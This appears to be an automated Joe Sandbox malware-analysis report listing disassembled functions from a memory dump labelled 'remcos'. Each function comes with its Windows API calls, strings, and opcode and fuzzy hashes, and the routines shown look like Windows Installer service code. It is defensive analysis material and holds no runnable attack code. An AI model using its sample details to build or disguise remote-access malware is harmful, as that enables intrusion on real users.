                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: 5745476f0f362b1ab0fafd431a1780fc8fe62e940e72eaae15eb713953a2635b
                                                                                                                                • Instruction ID: cec32b3ec1339c4da421f3db6daeb40b4e963cea529c3fbd8032c5da46a9854f
                                                                                                                                • Opcode Fuzzy Hash: 5745476f0f362b1ab0fafd431a1780fc8fe62e940e72eaae15eb713953a2635b
                                                                                                                                • Instruction Fuzzy Hash: F79002B0255984468A0037707C1DA3527915B886167850451E101C4554DB544180D911
                                                                                                                                Function 001F7EB0 Relevance: 88.0, APIs: 40, Strings: 10, Instructions: 481windowregistryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 001F3C24: EnterCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3C31
                                                                                                                                  • Part of subcall function 001F3C24: LeaveCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CDF
                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000002,00000000,00007530), ref: 001F7EFB
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 001F7F0B
                                                                                                                                  • Part of subcall function 001F8745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,001F7F98,00000200), ref: 001F875F
                                                                                                                                  • Part of subcall function 001F8745: memset.MSVCRT ref: 001F8778
                                                                                                                                • CoUninitialize.OLE32 ref: 001F7F5B
                                                                                                                                • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 001F8058
                                                                                                                                • CoUninitialize.OLE32 ref: 001F8066
                                                                                                                                • GetLastError.KERNEL32 ref: 001F806C
                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 001F80AC
                                                                                                                                • CoUninitialize.OLE32(00000002,00000000,00007530), ref: 001F80C2
                                                                                                                                • InitializeCriticalSection.KERNEL32(001FC488,00000002,00000000,00007530), ref: 001F81D2
                                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001F81F5
                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 001F8204
                                                                                                                                • GetLastError.KERNEL32 ref: 001F8246
                                                                                                                                • GetLastError.KERNEL32 ref: 001F8276
                                                                                                                                • CoRegisterClassObject.OLE32(001F25E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 001F82C0
                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 001F8343
                                                                                                                                • TranslateMessage.USER32(?), ref: 001F8375
                                                                                                                                • DispatchMessageW.USER32(?), ref: 001F8382
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F8394
                                                                                                                                • GetLastError.KERNEL32 ref: 001F83C6
                                                                                                                                • GetLastError.KERNEL32 ref: 001F83CC
                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 001F841B
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F843C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F8448
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F8459
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F846C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F8478
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F8489
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F849C
                                                                                                                                • CloseHandle.KERNEL32 ref: 001F84A8
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC488), ref: 001F84B9
                                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 001F84C3
                                                                                                                                • DeleteCriticalSection.KERNEL32(001FC488,00000001,00000000), ref: 001F84E0
                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,00000200), ref: 001F84EC
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F850D
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8526
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F853F
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8558
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 001F8571
                                                                                                                                Strings
                                                                                                                                • ServiceThreadMain: Class registration failed, xrefs: 001F8400
                                                                                                                                • ServiceThreadMain: CreateWaitableTimer failed., xrefs: 001F824C
                                                                                                                                • ServiceThreadMain: CoInitializeSecurity failed, xrefs: 001F80A0
                                                                                                                                • CLSID, xrefs: 001F7EF1
                                                                                                                                • ServiceThreadMain: CreateSD for CreateWaitableTimer failed., xrefs: 001F81B1
                                                                                                                                • ServiceThreadMain: CreateEvent failed., xrefs: 001F840D
                                                                                                                                • Wait Failed in MsgWait., xrefs: 001F83D4
                                                                                                                                • CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 001F8105
                                                                                                                                • ServiceThreadMain: SetWaitableTimer failed., xrefs: 001F827C
                                                                                                                                • Set of COMGLB_UNMARSHALING_POLICY failed., xrefs: 001F8163
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$ErrorLast$Global$FreeUninitialize$CloseEnterLeave$HandleMessage$CreateEvent$AbsoluteAllocClassDeleteDispatchInitializeMakeMultipleObjectObjectsOpenPeekRegisterTranslateWaitmemset
                                                                                                                                • String ID: CLSID$CoCreateInstance of CLSID_GlobalOptions failed.$ServiceThreadMain: Class registration failed$ServiceThreadMain: CoInitializeSecurity failed$ServiceThreadMain: CreateEvent failed.$ServiceThreadMain: CreateSD for CreateWaitableTimer failed.$ServiceThreadMain: CreateWaitableTimer failed.$ServiceThreadMain: SetWaitableTimer failed.$Set of COMGLB_UNMARSHALING_POLICY failed.$Wait Failed in MsgWait.
                                                                                                                                • API String ID: 535215923-1806920385
                                                                                                                                • Opcode ID: cfe1e5e5a682a501a6b0e532757ccecb2aae23fb7af044d076cf7abde2831a82
                                                                                                                                • Instruction ID: 94d62e281e8647f3c78ac1a1d79687c520458c1882cbfdc9e86147d209a181fa
                                                                                                                                • Opcode Fuzzy Hash: cfe1e5e5a682a501a6b0e532757ccecb2aae23fb7af044d076cf7abde2831a82
                                                                                                                                • Instruction Fuzzy Hash: 7A028070A0022DAFEB249B64ED89FBA77B9FB44704F004199B709A65A0DF709D85DF60
                                                                                                                                Function 001F57C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 131libraryloaderwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(ISMIF32.DLL,00000000,00000800,?,00000000), ref: 001F57F6
                                                                                                                                • GetProcAddress.KERNEL32(00000000,InstallStatusMIF), ref: 001F580C
                                                                                                                                • GetSystemDefaultLangID.KERNEL32(?,00000000), ref: 001F585C
                                                                                                                                • memset.MSVCRT ref: 001F589D
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000000,?,?,00000105,00000000,?,00000000), ref: 001F58C5
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,001FC920,00000100,00000000,00000000,?,00000000), ref: 001F5902
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 001F5976
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressByteCharDefaultFormatFreeLangLoadMessageMultiProcSystemWidememset
                                                                                                                                • String ID: ISMIF32.DLL$InstallStatusMIF$Installer error %i
                                                                                                                                • API String ID: 2186023739-4237920443
                                                                                                                                • Opcode ID: 53174c408b0dd5d55e56b9a1170879be50ae5d958722c6d795c6cc1cf03d8722
                                                                                                                                • Instruction ID: 20ab9a4e3958bbb01ed896786ae6416a35ce4237d4edf57c65cef2c19b9b4efa
                                                                                                                                • Opcode Fuzzy Hash: 53174c408b0dd5d55e56b9a1170879be50ae5d958722c6d795c6cc1cf03d8722
                                                                                                                                • Instruction Fuzzy Hash: 7641077074031CBEE714AB249C4AFFA36AAFB14728F100165F75AE20D0DBE09D8096A4
                                                                                                                                Function 001F8F66 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 55libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8F8C
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001F8F9F
                                                                                                                                • GetLastError.KERNEL32(?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FAB
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FE0
                                                                                                                                • SetLastError.KERNEL32(00000000,?,001F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,001F90C6,0000020A,?), ref: 001F8FE7
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001F8FF8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastLibrary$AddressDirectoryFreeLoadProcSystem
                                                                                                                                • String ID: GetSystemWow64DirectoryW$OLEAUT32.dll$kernel32.dll
                                                                                                                                • API String ID: 1648426049-138662608
                                                                                                                                • Opcode ID: 0761025849064eae0a2895eab78e4d9ed7569509660cc18ebf1bfc195dbab7bd
                                                                                                                                • Instruction ID: 1e63ca7f5855253d6f83f3023cdd9c079574ee19d93dbd0370bcb2c00a86c6ac
                                                                                                                                • Opcode Fuzzy Hash: 0761025849064eae0a2895eab78e4d9ed7569509660cc18ebf1bfc195dbab7bd
                                                                                                                                • Instruction Fuzzy Hash: 1C01D83670861A6FD7126B64BD0CA7F7A9BEB84351F160125F703D2650EFB0CC81D694
                                                                                                                                Function 001F5441 Relevance: 16.6, APIs: 11, Instructions: 127librarystringloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32 ref: 001F5475
                                                                                                                                  • Part of subcall function 001F8665: GlobalAlloc.KERNEL32(00000040,?,00000020,-00000002,00000000,?,001F66E9,?,?,?), ref: 001F8680
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 001F54EB
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 001F54FF
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000008), ref: 001F5511
                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 001F551B
                                                                                                                                • SetThreadToken.ADVAPI32(00000000,00000000,?,00000000,00000008), ref: 001F5534
                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000008), ref: 001F553E
                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 001F5559
                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000008), ref: 001F5565
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000008), ref: 001F558D
                                                                                                                                • CoUninitialize.OLE32(?,00000000,00000008), ref: 001F5593
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$Library$AddressAllocCurrentDirectoryFreeGlobalInitializeLoadProcThreadTokenUninitializelstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1429436423-0
                                                                                                                                • Opcode ID: 02b03c1a95c0342472903a7a4e63f82ef736fba28adafc02e670a1ff0cea98d8
                                                                                                                                • Instruction ID: 06072fe9ed59410e2a56f423a84348c3d29a5ca718cec6e3ea1fbab27b7b06bd
                                                                                                                                • Opcode Fuzzy Hash: 02b03c1a95c0342472903a7a4e63f82ef736fba28adafc02e670a1ff0cea98d8
                                                                                                                                • Instruction Fuzzy Hash: BE412572A0093D5BC7315B289C487BE7277AF94751F020169EF46E7260EF30CD8186D0
                                                                                                                                Function 001F90E9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • ResolveDelayLoadedAPI, xrefs: 001F9123
                                                                                                                                • ResolveDelayLoadsFromDll, xrefs: 001F9137
                                                                                                                                • KERNEL32.DLL, xrefs: 001F9113
                                                                                                                                • api-ms-win-core-delayload-l1-1-1.dll, xrefs: 001F9103
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: KERNEL32.DLL$ResolveDelayLoadedAPI$ResolveDelayLoadsFromDll$api-ms-win-core-delayload-l1-1-1.dll
                                                                                                                                • API String ID: 0-3594434003
                                                                                                                                • Opcode ID: e6e8a5e000c00221a1547e0edc94c7954b5de987ab69cc84c4a8dfe419856786
                                                                                                                                • Instruction ID: a09a1e4d88b1b8f32c4131a22fd3b942614dba0a344214f1327b70d997aac2fd
                                                                                                                                • Opcode Fuzzy Hash: e6e8a5e000c00221a1547e0edc94c7954b5de987ab69cc84c4a8dfe419856786
                                                                                                                                • Instruction Fuzzy Hash: 74F0E9B268663F678F317AE85CD2BBE66895A16BE13010275FB00E7154DB20CC81D6D0
                                                                                                                                Function 001F7E20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registrythreadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 001F7E2A
                                                                                                                                • GetLastError.KERNEL32 ref: 001F7E39
                                                                                                                                  • Part of subcall function 001F59F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 001F5A12
                                                                                                                                  • Part of subcall function 001F59F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 001F5A8A
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5AAA
                                                                                                                                  • Part of subcall function 001F59F2: GlobalFree.KERNEL32(?), ref: 001F5ABF
                                                                                                                                  • Part of subcall function 001F59F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 001F5B14
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 001F5B35
                                                                                                                                  • Part of subcall function 001F59F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 001F5B3C
                                                                                                                                  • Part of subcall function 001F59F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 001F5B59
                                                                                                                                  • Part of subcall function 001F59F2: RegCloseKey.ADVAPI32(?), ref: 001F5B65
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,001FC6A8), ref: 001F7E72
                                                                                                                                • GetLastError.KERNEL32(00007530), ref: 001F7E80
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastValue$CloseCreate$CtrlFreeGlobalHandlerQueryRegisterServiceThreadlstrlen
                                                                                                                                • String ID: MSIServer$RegisterServiceCtrlHandler failed.
                                                                                                                                • API String ID: 1878216277-870239898
                                                                                                                                • Opcode ID: f5ee3d5d44723c5ada7f99b2f8dc5edc27018f188088468047aade7c5f40fdce
                                                                                                                                • Instruction ID: d62f5115d33ab4e95275d690c847b94fa365e09b7328b9a01027b933df561890
                                                                                                                                • Opcode Fuzzy Hash: f5ee3d5d44723c5ada7f99b2f8dc5edc27018f188088468047aade7c5f40fdce
                                                                                                                                • Instruction Fuzzy Hash: B301F431648229BBD32067A6BE0EE7B3E9ADB85761B000153BB09E16D1DF70CC42C6F1
                                                                                                                                Function 001F4CEC Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: MSIINSTANCEGUID=
                                                                                                                                • API String ID: 1659193697-2015669138
                                                                                                                                • Opcode ID: d99f7c31f6c7f24f107b20a5e72a7af6fe78adb2cf177eb367e94a42e8891cb5
                                                                                                                                • Instruction ID: bff2a7859bda90e9ca919ad19a37062116eb13b3fdd8dce1d303d09105d6def9
                                                                                                                                • Opcode Fuzzy Hash: d99f7c31f6c7f24f107b20a5e72a7af6fe78adb2cf177eb367e94a42e8891cb5
                                                                                                                                • Instruction Fuzzy Hash: 92416E36A0021C9BC710AB70ED89BBB77B5BB54364F140164FB0AE7691EF749D81CB94
                                                                                                                                Function 001F5BF0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,Msi.dll,00000000,00000000,?,?,001F3B73), ref: 001F5C06
                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryInstanceCount), ref: 001F5C18
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,001F3B73), ref: 001F5C35
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,001F3B73), ref: 001F5C42
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary$AddressHandleModuleProc
                                                                                                                                • String ID: Msi.dll$QueryInstanceCount
                                                                                                                                • API String ID: 1227796897-1207408768
                                                                                                                                • Opcode ID: 7d6d1f283556ec68c32bef073d4bff0c9a4470f49e80116721e9b5d6867b554d
                                                                                                                                • Instruction ID: 92f57a12d8836b5fefde8b5f03e52dccae9db6592e41fce102f376769db7a67f
                                                                                                                                • Opcode Fuzzy Hash: 7d6d1f283556ec68c32bef073d4bff0c9a4470f49e80116721e9b5d6867b554d
                                                                                                                                • Instruction Fuzzy Hash: 64F0543165561CFBDB105761ED09ABD7E6EEF04756F110560AA03E1160DB75CE00EA94
                                                                                                                                Function 001F5070 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 214COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: PECMS$PackageCode$REINSTALL=ALL REINSTALLMODE=%s$rpoedcamusv
                                                                                                                                • API String ID: 1659193697-1647986965
                                                                                                                                • Opcode ID: 6cea46d5e793414511ad332a1d222c978628f07aa88284e2e3a0896049199907
                                                                                                                                • Instruction ID: 59adba9cb7405b4a3ad89cbf9e2ffe18e5e2f62d23c50a06d3350a16882acdd8
                                                                                                                                • Opcode Fuzzy Hash: 6cea46d5e793414511ad332a1d222c978628f07aa88284e2e3a0896049199907
                                                                                                                                • Instruction Fuzzy Hash: 86610272608B499BD734DF64E855BBB73EAEB94350F10092AFB46C7280EB70D944C782
                                                                                                                                Function 001F3C24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnterCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3C31
                                                                                                                                • SetServiceStatus.ADVAPI32(001FC850,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CC0
                                                                                                                                • GetLastError.KERNEL32(?,?,?,001F3C1E,00000000,00000000), ref: 001F3CCC
                                                                                                                                • LeaveCriticalSection.KERNEL32(001FC838,?,?,?,001F3C1E,00000000,00000000), ref: 001F3CDF
                                                                                                                                Strings
                                                                                                                                • SetServiceStatus failed., xrefs: 001F3CD4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveServiceStatus
                                                                                                                                • String ID: SetServiceStatus failed.
                                                                                                                                • API String ID: 427148986-1344523210
                                                                                                                                • Opcode ID: 860987d20826dc402fa0447227951eeadec6a659231e9be33010d7b9004298e2
                                                                                                                                • Instruction ID: 8ee0c77545709fa5afc5c03a6e614ebcad025e641ef0524aa717fbcbfc1072a0
                                                                                                                                • Opcode Fuzzy Hash: 860987d20826dc402fa0447227951eeadec6a659231e9be33010d7b9004298e2
                                                                                                                                • Instruction Fuzzy Hash: 63118F7290025CDBC7119F29EE4873977E5E7A47A1F05402BFA25A3A30C7B18D85EBD0
                                                                                                                                Function 001F63A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(001F6E67,?), ref: 001F63A0
                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 001F63B3
                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001F63C4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcVersion
                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                • API String ID: 3310240892-3460614246
                                                                                                                                • Opcode ID: 3ae87e9f9509294909f7e754a3ba821084974da785cb36111670ca8405966a9c
                                                                                                                                • Instruction ID: 06adc378cfc5782b68d5abc234bce056ee9a2f4049655ee452227c5f21e1c3d8
                                                                                                                                • Opcode Fuzzy Hash: 3ae87e9f9509294909f7e754a3ba821084974da785cb36111670ca8405966a9c
                                                                                                                                • Instruction Fuzzy Hash: F8E08C30740229BBDA6027727C8DBBB7A4EFB10B827004011BA09E2590DB20CC81C6B0
                                                                                                                                Function 001F9A60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 001F9B4E
                                                                                                                                • ?terminate@@YAXXZ.MSVCRT ref: 001F9BF7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
